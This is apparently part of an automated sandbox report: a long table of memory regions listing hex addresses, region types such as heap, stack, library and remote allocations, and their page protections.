page read and write
|
||
|
23FE000
|
stack
|
page read and write
|
||
|
7D92000
|
heap
|
page read and write
|
||
|
7D54000
|
heap
|
page read and write
|
||
|
8975000
|
trusted library allocation
|
page read and write
|
||
|
4B00000
|
heap
|
page execute and read and write
|
||
|
23650000
|
trusted library allocation
|
page read and write
|
||
|
701F000
|
stack
|
page read and write
|
||
|
17BC1608000
|
trusted library allocation
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34950000
|
trusted library allocation
|
page read and write
|
||
|
709E000
|
stack
|
page read and write
|
||
|
7890000
|
direct allocation
|
page read and write
|
||
|
17BC15B1000
|
trusted library allocation
|
page read and write
|
||
|
7840000
|
trusted library allocation
|
page read and write
|
||
|
25E9E000
|
stack
|
page read and write
|
||
|
17BD7BBE000
|
heap
|
page read and write
|
||
|
7FFD34780000
|
trusted library allocation
|
page execute and read and write
|
||
|
23721000
|
trusted library allocation
|
page read and write
|
||
|
C4EFDFF000
|
stack
|
page read and write
|
||
|
236D9000
|
trusted library allocation
|
page read and write
|
||
|
15991BF000
|
stack
|
page read and write
|
||
|
3259000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34910000
|
trusted library allocation
|
page read and write
|
||
|
95F9000
|
direct allocation
|
page execute and read and write
|
||
|
23660000
|
trusted library allocation
|
page read and write
|
||
|
17BD7AD0000
|
heap
|
page read and write
|
||
|
4B60000
|
heap
|
page read and write
|
||
|
22C4000
|
trusted library allocation
|
page read and write
|
||
|
25753000
|
heap
|
page read and write
|
||
|
7B90000
|
direct allocation
|
page read and write
|
||
|
94A0000
|
direct allocation
|
page execute and read and write
|
||
|
17BD7BD0000
|
heap
|
page read and write
|
||
|
231AF000
|
stack
|
page read and write
|
||
|
234C0000
|
trusted library allocation
|
page read and write
|
||
|
306B000
|
heap
|
page read and write
|
||
|
17BBD88D000
|
heap
|
page read and write
|
||
|
32E0000
|
heap
|
page readonly
|
||
|
7A70000
|
trusted library allocation
|
page read and write
|
||
|
234C0000
|
trusted library allocation
|
page read and write
|
||
|
7E5D000
|
stack
|
page read and write
|
||
|
78F0000
|
heap
|
page execute and read and write
|
||
|
7C40000
|
direct allocation
|
page read and write
|
||
|
236F5000
|
trusted library allocation
|
page read and write
|
||
|
17BC0A66000
|
trusted library allocation
|
page read and write
|
||
|
2371E000
|
trusted library allocation
|
page read and write
|
||
|
3234000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
|
23640000
|
trusted library allocation
|
page read and write
|
||
|
D1F9000
|
direct allocation
|
page execute and read and write
|
||
|
7772000
|
heap
|
page read and write
|
||
|
736A000
|
stack
|
page read and write
|
||
|
159983B000
|
stack
|
page read and write
|
||
|
234A0000
|
trusted library allocation
|
page read and write
|
||
|
15994B7000
|
stack
|
page read and write
|
||
|
6F00000
|
heap
|
page execute and read and write
|
||
|
25774000
|
heap
|
page read and write
|
||
|
2E3C000
|
stack
|
page read and write
|
||
|
5B99000
|
trusted library allocation
|
page read and write
|
||
|
232B0000
|
remote allocation
|
page read and write
|
||
|
5184000
|
trusted library allocation
|
page read and write
|
||
|
3260000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346D0000
|
trusted library allocation
|
page read and write
|
||
|
22E0000
|
trusted library allocation
|
page read and write
|
||
|
17BD7AEC000
|
heap
|
page read and write
|
||
|
87A0000
|
heap
|
page read and write
|
||
|
236FC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A30000
|
trusted library allocation
|
page read and write
|
||
|
7870000
|
direct allocation
|
page read and write
|
||
|
77E3000
|
heap
|
page read and write
|
||
|
23360000
|
direct allocation
|
page read and write
|
||
|
23640000
|
trusted library allocation
|
page read and write
|
||
|
32F0000
|
heap
|
page read and write
|
||
|
7A20000
|
trusted library allocation
|
page read and write
|
||
|
712D000
|
stack
|
page read and write
|
||
|
23629000
|
trusted library allocation
|
page read and write
|
||
|
7B4E000
|
stack
|
page read and write
|
||
|
8807000
|
trusted library allocation
|
page read and write
|
||
|
17BC1091000
|
trusted library allocation
|
page read and write
|
||
|
5BD7000
|
trusted library allocation
|
page read and write
|
||
|
17BBD850000
|
heap
|
page read and write
|
||
|
7A50000
|
trusted library allocation
|
page read and write
|
||
|
232B0000
|
remote allocation
|
page read and write
|
||
|
17BBD7C0000
|
heap
|
page read and write
|
||
|
7FFD34920000
|
trusted library allocation
|
page read and write
|
||
|
5B81000
|
trusted library allocation
|
page read and write
|
||
|
17BC158D000
|
trusted library allocation
|
page read and write
|
||
|
75CE000
|
stack
|
page read and write
|
||
|
236E9000
|
trusted library allocation
|
page read and write
|
||
|
882A000
|
trusted library allocation
|
page read and write
|
||
|
23640000
|
trusted library allocation
|
page read and write
|
||
|
25780000
|
heap
|
page read and write
|
||
|
23635000
|
trusted library allocation
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
7FFD34880000
|
trusted library allocation
|
page execute and read and write
|
||
|
4DB9000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD348D0000
|
trusted library allocation
|
page read and write
|
||
|
78C0000
|
trusted library allocation
|
page read and write
|
||
|
25CDC000
|
stack
|
page read and write
|
||
|
17BC17F9000
|
trusted library allocation
|
page read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
236E7000
|
trusted library allocation
|
page read and write
|
||
|
7BF0000
|
direct allocation
|
page read and write
|
||
|
4ADF000
|
stack
|
page read and write
|
||
|
25C5D000
|
stack
|
page read and write
|
||
|
7D93000
|
heap
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
257A0000
|
heap
|
page read and write
|
||
|
8A7C000
|
stack
|
page read and write
|
||
|
7BE0000
|
direct allocation
|
page read and write
|
||
|
7730000
|
heap
|
page read and write
|
||
|
17BD7AC7000
|
heap
|
page execute and read and write
|
||
|
5B71000
|
trusted library allocation
|
page read and write
|
||
|
7CE8000
|
heap
|
page read and write
|
||
|
17BBD855000
|
heap
|
page read and write
|
||
|
B3F9000
|
direct allocation
|
page execute and read and write
|
||
|
23640000
|
trusted library allocation
|
page read and write
|
||
|
28B34A00000
|
heap
|
page read and write
|
||
|
23640000
|
trusted library allocation
|
page read and write
|
||
|
BDF9000
|
direct allocation
|
page execute and read and write
|
||
|
17BC159E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3487A000
|
trusted library allocation
|
page read and write
|
||
|
3210000
|
trusted library section
|
page read and write
|
||
|
31EF000
|
unkown
|
page read and write
|
||
|
17BBD830000
|
heap
|
page read and write
|
||
|
17BC0066000
|
trusted library allocation
|
page read and write
|
||
|
7D54000
|
heap
|
page read and write
|
||
|
3200000
|
trusted library section
|
page read and write
|
||
|
17BBFE8B000
|
trusted library allocation
|
page read and write
|
||
|
84F5000
|
heap
|
page read and write
|
||
|
28B3483B000
|
heap
|
page read and write
|
||
|
22FB000
|
trusted library allocation
|
page execute and read and write
|
||
|
300E000
|
unkown
|
page read and write
|
||
|
17BBD934000
|
heap
|
page read and write
|
||
|
17BBFC48000
|
trusted library allocation
|
page read and write
|
||
|
17BBD97B000
|
heap
|
page read and write
|
||
|
7B80000
|
direct allocation
|
page read and write
|
||
|
17BBF260000
|
heap
|
page read and write
|
||
|
3220000
|
trusted library allocation
|
page read and write
|
||
|
17BBD92E000
|
heap
|
page read and write
|
||
|
23650000
|
trusted library allocation
|
page read and write
|
||
|
17BD7B45000
|
heap
|
page read and write
|
||
|
22B0000
|
trusted library allocation
|
page read and write
|
||
|
4B71000
|
trusted library allocation
|
page read and write
|
||
|
2312D000
|
stack
|
page read and write
|
||
|
C4EF9ED000
|
stack
|
page read and write
|
||
|
17BBF5FB000
|
heap
|
page read and write
|
||
|
23660000
|
trusted library allocation
|
page read and write
|
||
|
22F0000
|
trusted library allocation
|
page read and write
|
||
|
22EA000
|
trusted library allocation
|
page execute and read and write
|
||
|
236F7000
|
trusted library allocation
|
page read and write
|
||
|
7642000
|
heap
|
page read and write
|
||
|
22F2000
|
trusted library allocation
|
page read and write
|
||
|
17BBF620000
|
heap
|
page read and write
|
||
|
159973E000
|
stack
|
page read and write
|
||
|
7CBE000
|
stack
|
page read and write
|
||
|
17BC15CB000
|
trusted library allocation
|
page read and write
|
||
|
17BBF9FD000
|
trusted library allocation
|
page read and write
|
||
|
6BB9000
|
remote allocation
|
page execute and read and write
|
||
|
7D49000
|
heap
|
page read and write
|
||
|
78A0000
|
direct allocation
|
page read and write
|
||
|
23BE000
|
stack
|
page read and write
|
||
|
17BBD92C000
|
heap
|
page read and write
|
||
|
86F0000
|
trusted library allocation
|
page read and write
|
||
|
2FDD000
|
heap
|
page read and write
|
||
|
7D57000
|
heap
|
page read and write
|
||
|
17BBFCCB000
|
trusted library allocation
|
page read and write
|
||
|
326A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2601E000
|
stack
|
page read and write
|
||
|
89FC000
|
stack
|
page read and write
|
||
|
3290000
|
trusted library allocation
|
page read and write
|
||
|
8544000
|
heap
|
page read and write
|
||
|
25FA0000
|
trusted library allocation
|
page read and write
|
||
|
23640000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34900000
|
trusted library allocation
|
page read and write
|
||
|
17BC1596000
|
trusted library allocation
|
page read and write
|
||
|
71B0000
|
direct allocation
|
page read and write
|
||
|
32DE000
|
stack
|
page read and write
|
||
|
25B5E000
|
stack
|
page read and write
|
||
|
23670000
|
trusted library allocation
|
page read and write
|
||
|
2332F000
|
stack
|
page read and write
|
||
|
17BD77DA000
|
heap
|
page read and write
|
||
|
31E0000
|
heap
|
page read and write
|
||
|
236C5000
|
trusted library allocation
|
page read and write
|
||
|
17BCFAB9000
|
trusted library allocation
|
page read and write
|
||
|
23400000
|
trusted library allocation
|
page read and write
|
||
|
32FB000
|
heap
|
page read and write
|
||
|
7F420000
|
trusted library allocation
|
page execute and read and write
|
||
|
7752000
|
heap
|
page read and write
|
||
|
39B9000
|
remote allocation
|
page execute and read and write
|
||
|
17BC005A000
|
trusted library allocation
|
page read and write
|
||
|
6EF0000
|
trusted library allocation
|
page read and write
|
||
|
7BC6000
|
heap
|
page read and write
|
||
|
7DA3000
|
heap
|
page read and write
|
||
|
17BCF7F1000
|
trusted library allocation
|
page read and write
|
||
|
3248000
|
heap
|
page read and write
|
||
|
86E0000
|
trusted library allocation
|
page read and write
|
||
|
7B70000
|
heap
|
page readonly
|
||
|
77C5000
|
heap
|
page read and write
|
||
|
77FE000
|
heap
|
page read and write
|
||
|
71C0000
|
direct allocation
|
page read and write
|
||
|
78E0000
|
trusted library allocation
|
page read and write
|
||
|
23640000
|
trusted library allocation
|
page read and write
|
||
|
760F000
|
stack
|
page read and write
|
||
|
8810000
|
trusted library allocation
|
page read and write
|
||
|
17BC171B000
|
trusted library allocation
|
page read and write
|
||
|
17BD7B05000
|
heap
|
page read and write
|
||
|
2300000
|
trusted library allocation
|
page execute and read and write
|
||
|
8800000
|
trusted library allocation
|
page read and write
|
||
|
7E1F000
|
stack
|
page read and write
|
||
|
7FFD34890000
|
trusted library allocation
|
page execute and read and write
|
||
|
17BBFC5F000
|
trusted library allocation
|
page read and write
|
||
|
23400000
|
trusted library allocation
|
page read and write
|
||
|
17BBD880000
|
heap
|
page read and write
|
||
|
25690000
|
heap
|
page read and write
|
||
|
3270000
|
trusted library allocation
|
page read and write
|
||
|
4BD0000
|
trusted library allocation
|
page read and write
|
||
|
22E6000
|
trusted library allocation
|
page execute and read and write
|
||
|
23650000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3477C000
|
trusted library allocation
|
page execute and read and write
|
||
|
57B9000
|
remote allocation
|
page execute and read and write
|
||
|
23650000
|
trusted library allocation
|
page read and write
|
||
|
7EDD000
|
stack
|
page read and write
|
||
|
7D23000
|
heap
|
page read and write
|
||
|
7E9F000
|
stack
|
page read and write
|
||
|
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
|
17BBFC50000
|
trusted library allocation
|
page read and write
|
||
|
23626000
|
trusted library allocation
|
page read and write
|
||
|
234A6000
|
trusted library allocation
|
page read and write
|
||
|
7739000
|
heap
|
page read and write
|
||
|
2316E000
|
stack
|
page read and write
|
||
|
17BBF669000
|
heap
|
page read and write
|
||
|
234C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23350000
|
direct allocation
|
page read and write
|
||
|
15992FE000
|
stack
|
page read and write
|
||
|
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
|
7797000
|
heap
|
page read and write
|
||
|
7793000
|
heap
|
page read and write
|
||
|
234C0000
|
trusted library allocation
|
page read and write
|
||
|
4B4C000
|
stack
|
page read and write
|
||
|
159917E000
|
stack
|
page read and write
|
||
|
323B000
|
heap
|
page read and write
|
||
|
28B34AC5000
|
heap
|
page read and write
|
||
|
89BC000
|
stack
|
page read and write
|
||
|
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
|
17BC161D000
|
trusted library allocation
|
page read and write
|
||
|
159937D000
|
stack
|
page read and write
|
||
|
7A10000
|
trusted library allocation
|
page read and write
|
||
|
73A2000
|
heap
|
page read and write
|
||
|
17BBFC89000
|
trusted library allocation
|
page read and write
|
||
|
17BBD6E0000
|
heap
|
page read and write
|
||
|
23400000
|
trusted library allocation
|
page read and write
|
||
|
17BBF240000
|
trusted library allocation
|
page read and write
|
||
|
28B34810000
|
heap
|
page read and write
|
||
|
3010000
|
heap
|
page read and write
|
||
|
705E000
|
stack
|
page read and write
|
||
|
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
|
318E000
|
stack
|
page read and write
|
||
|
43B9000
|
remote allocation
|
page execute and read and write
|
||
|
24691000
|
trusted library allocation
|
page read and write
|
||
|
7DF46A0B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7EF8000
|
heap
|
page read and write
|
||
|
71E0000
|
direct allocation
|
page read and write
|
||
|
7A60000
|
trusted library allocation
|
page read and write
|
||
|
716B000
|
stack
|
page read and write
|
||
|
23406000
|
trusted library allocation
|
page read and write
|
||
|
23732000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
|
236C7000
|
trusted library allocation
|
page read and write
|
||
|
7170000
|
direct allocation
|
page read and write
|
||
|
17BBF1B0000
|
trusted library allocation
|
page read and write
|
||
|
17BBFC5B000
|
trusted library allocation
|
page read and write
|
||
|
2370000
|
heap
|
page read and write
|
||
|
17BBFC74000
|
trusted library allocation
|
page read and write
|
||
|
6F05000
|
heap
|
page execute and read and write
|
||
|
236EB000
|
trusted library allocation
|
page read and write
|
||
|
3098000
|
heap
|
page read and write
|
||
|
6BAE000
|
stack
|
page read and write
|
||
|
17BBF608000
|
heap
|
page read and write
|
||
|
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
|
23650000
|
heap
|
page read and write
|
||
|
7FFD348A2000
|
trusted library allocation
|
page read and write
|
||
|
25B60000
|
trusted library allocation
|
page read and write
|
||
|
234C0000
|
trusted library allocation
|
page read and write
|
||
|
4CCC000
|
trusted library allocation
|
page read and write
|
||
|
25751000
|
heap
|
page read and write
|
||
|
6F5E000
|
stack
|
page read and write
|
||
|
17BC000D000
|
trusted library allocation
|
page read and write
|
||
|
7190000
|
direct allocation
|
page read and write
|
||
|
84E8000
|
heap
|
page read and write
|
||
|
7AA0000
|
trusted library allocation
|
page read and write
|
||
|
726A000
|
stack
|
page read and write
|
||
|
2371A000
|
trusted library allocation
|
page read and write
|
||
|
7EE0000
|
trusted library allocation
|
page read and write
|
||
|
236DD000
|
trusted library allocation
|
page read and write
|
||
|
4B50000
|
trusted library allocation
|
page execute and read and write
|
||
|
17BBF180000
|
trusted library allocation
|
page read and write
|
||
|
7BD0000
|
direct allocation
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
7DA0000
|
heap
|
page read and write
|
||
|
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
|
7C10000
|
direct allocation
|
page read and write
|
||
|
3250000
|
trusted library allocation
|
page read and write
|
||
|
25B70000
|
trusted library allocation
|
page read and write
|
||
|
25DDC000
|
stack
|
page read and write
|
||
|
7FFD346C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
17BD78E0000
|
heap
|
page read and write
|
||
|
234C0000
|
trusted library allocation
|
page read and write
|
||
|
17BBD948000
|
heap
|
page read and write
|
||
|
8A3E000
|
stack
|
page read and write
|
||
|
778B000
|
heap
|
page read and write
|
||
|
7FFD34860000
|
trusted library allocation
|
page read and write
|
||
|
23604000
|
trusted library allocation
|
page read and write
|
||
|
84D0000
|
heap
|
page read and write
|
||
|
25706000
|
heap
|
page read and write
|
||
|
23400000
|
trusted library allocation
|
page read and write
|
||
|
17BBD936000
|
heap
|
page read and write
|
||
|
17BBF5B0000
|
heap
|
page read and write
|
||
|
234B0000
|
trusted library allocation
|
page read and write
|
||
|
233F0000
|
trusted library allocation
|
page read and write
|
||
|
8AA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
17BC1579000
|
trusted library allocation
|
page read and write
|
||
|
17BD7BC2000
|
heap
|
page read and write
|
||
|
8830000
|
trusted library allocation
|
page read and write
|
||
|
793E000
|
stack
|
page read and write
|
||
|
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
|
310D000
|
stack
|
page read and write
|
||
|
3063000
|
heap
|
page read and write
|
||
|
232EE000
|
stack
|
page read and write
|
||
|
236DB000
|
trusted library allocation
|
page read and write
|
||
|
25D9E000
|
stack
|
page read and write
|
||
|
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
|
305A000
|
heap
|
page read and write
|
||
|
7D96000
|
heap
|
page read and write
|
||
|
17BBFFF2000
|
trusted library allocation
|
page read and write
|
||
|
7D57000
|
heap
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
23650000
|
trusted library allocation
|
page read and write
|
||
|
234C0000
|
trusted library allocation
|
page read and write
|
||
|
17BD7901000
|
heap
|
page read and write
|
||
|
23660000
|
trusted library allocation
|
page read and write
|
||
|
234D0000
|
heap
|
page read and write
|
||
|
25D1D000
|
stack
|
page read and write
|
||
|
3860000
|
remote allocation
|
page execute and read and write
|
||
|
23737000
|
trusted library allocation
|
page read and write
|
||
|
3530000
|
heap
|
page read and write
|
||
|
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346C0000
|
trusted library allocation
|
page read and write
|
||
|
17BBF200000
|
trusted library allocation
|
page read and write
|
||
|
7749000
|
heap
|
page read and write
|
||
|
732E000
|
stack
|
page read and write
|
||
|
159A20E000
|
stack
|
page read and write
|
||
|
779F000
|
heap
|
page read and write
|
||
|
75B9000
|
remote allocation
|
page execute and read and write
|
||
|
7B50000
|
heap
|
page read and write
|
||
|
23680000
|
heap
|
page read and write
|
||
|
28B34AD0000
|
heap
|
page read and write
|
||
|
233E9000
|
stack
|
page read and write
|
||
|
17BBF624000
|
heap
|
page read and write
|
||
|
84E0000
|
heap
|
page read and write
|
||
|
23640000
|
trusted library allocation
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
22D0000
|
trusted library allocation
|
page read and write
|
||
|
17BD79E0000
|
heap
|
page execute and read and write
|
||
|
8AC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7A30000
|
trusted library allocation
|
page read and write
|
||
|
23640000
|
trusted library allocation
|
page read and write
|
||
|
15996BE000
|
stack
|
page read and write
|
||
|
231B0000
|
heap
|
page read and write
|
||
|
7D50000
|
heap
|
page read and write
|
||
|
7FFD346CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
17BBF7C0000
|
heap
|
page execute and read and write
|
||
|
17BBF85E000
|
trusted library allocation
|
page read and write
|
||
|
23650000
|
trusted library allocation
|
page read and write
|
||
|
3520000
|
heap
|
page read and write
|
||
|
23640000
|
trusted library allocation
|
page read and write
|
||
|
17BCFAC8000
|
trusted library allocation
|
page read and write
|
||
|
22E2000
|
trusted library allocation
|
page read and write
|
||
|
17BBF1C0000
|
heap
|
page readonly
|
||
|
25D5D000
|
stack
|
page read and write
|
||
|
17BBF6B0000
|
heap
|
page read and write
|
||
|
7AB0000
|
trusted library allocation
|
page read and write
|
||
|
234A0000
|
trusted library allocation
|
page read and write
|
||
|
314E000
|
stack
|
page read and write
|
||
|
25E5C000
|
stack
|
page read and write
|
||
|
235FD000
|
stack
|
page read and write
|
||
|
2B8D000
|
stack
|
page read and write
|
||
|
17BC160C000
|
trusted library allocation
|
page read and write
|
||
|
6FDE000
|
stack
|
page read and write
|
||
|
8820000
|
trusted library allocation
|
page read and write
|
||
|
17BBF1D0000
|
trusted library allocation
|
page read and write
|
||
|
519A000
|
trusted library allocation
|
page read and write
|
||
|
84A7000
|
stack
|
page read and write
|
||
|
855D000
|
heap
|
page read and write
|
||
|
24697000
|
trusted library allocation
|
page read and write
|
||
|
7D40000
|
heap
|
page read and write
|
||
|
23400000
|
trusted library allocation
|
page read and write
|
||
|
23670000
|
trusted library allocation
|
page read and write
|
||
|
2370C000
|
trusted library allocation
|
page read and write
|
||
|
28B34830000
|
heap
|
page read and write
|
||
|
7C20000
|
direct allocation
|
page read and write
|
||
|
84B0000
|
heap
|
page read and write
|
||
|
61B9000
|
remote allocation
|
page execute and read and write
|
||
|
17BBFF50000
|
trusted library allocation
|
page read and write
|
||
|
234B0000
|
trusted library allocation
|
page read and write
|
||
|
23705000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34871000
|
trusted library allocation
|
page read and write
|
||
|
232B0000
|
remote allocation
|
page read and write
|
||
|
8840000
|
trusted library allocation
|
page read and write
|
||
|
5E1B000
|
trusted library allocation
|
page read and write
|
||
|
17BBD90D000
|
heap
|
page read and write
|
||
|
17BCF7E0000
|
trusted library allocation
|
page read and write
|
||
|
8A80000
|
trusted library allocation
|
page read and write
|
||
|
23730000
|
trusted library allocation
|
page read and write
|
||
|
7D57000
|
heap
|
page read and write
|
||
|
7D55000
|
heap
|
page read and write
|
||
|
15993F9000
|
stack
|
page read and write
|
||
|
879E000
|
stack
|
page read and write
|
||
|
73B0000
|
heap
|
page read and write
|
||
|
2EC0000
|
heap
|
page read and write
|
||
|
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
|
6F9E000
|
stack
|
page read and write
|
||
|
2EC9000
|
heap
|
page read and write
|
||
|
17BC000F000
|
trusted library allocation
|
page read and write
|
||
|
8AF0000
|
direct allocation
|
page read and write
|
||
|
7180000
|
direct allocation
|
page read and write
|
||
|
159A30A000
|
stack
|
page read and write
|
||
|
7FFD347A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7787000
|
heap
|
page read and write
|
||
|
8A90000
|
trusted library allocation
|
page read and write
|
||
|
79FD000
|
stack
|
page read and write
|
||
|
7B0E000
|
stack
|
page read and write
|
||
|
17BBD975000
|
heap
|
page read and write
|
||
|
7830000
|
trusted library allocation
|
page read and write
|
||
|
7BA0000
|
direct allocation
|
page read and write
|
||
|
3272000
|
trusted library allocation
|
page read and write
|
||
|
17BC0003000
|
trusted library allocation
|
page read and write
|
||
|
17BBF5FE000
|
heap
|
page read and write
|
||
|
17BBF5F1000
|
heap
|
page read and write
|
||
|
25C9D000
|
stack
|
page read and write
|
||
|
7C30000
|
direct allocation
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
28B34AC0000
|
heap
|
page read and write
|
||
|
7FFD347E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
87B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2349F000
|
stack
|
page read and write
|
||
|
236ED000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
|
234C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346DB000
|
trusted library allocation
|
page read and write
|
||
|
7B1B000
|
stack
|
page read and write
|
||
|
3275000
|
trusted library allocation
|
page execute and read and write
|
||
|
4AE8000
|
trusted library allocation
|
page read and write
|
||
|
2320D000
|
stack
|
page read and write
|
||
|
17BBD8FD000
|
heap
|
page read and write
|
||
|
17BD7B70000
|
heap
|
page read and write
|
||
|
2E77000
|
stack
|
page read and write
|
||
|
8AE0000
|
direct allocation
|
page read and write
|
||
|
875D000
|
stack
|
page read and write
|
||
|
236D3000
|
trusted library allocation
|
page read and write
|
||
|
15990FD000
|
stack
|
page read and write
|
||
|
23650000
|
trusted library allocation
|
page read and write
|
||
|
8549000
|
heap
|
page read and write
|
||
|
17BBF64F000
|
heap
|
page read and write
|
||
|
7C00000
|
direct allocation
|
page read and write
|
||
|
7BC0000
|
heap
|
page read and write
|
||
|
3230000
|
heap
|
page read and write
|
||
|
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
|
234E8000
|
trusted library allocation
|
page read and write
|
||
|
2324C000
|
stack
|
page read and write
|
There are 560 hidden memdumps, click here to show them.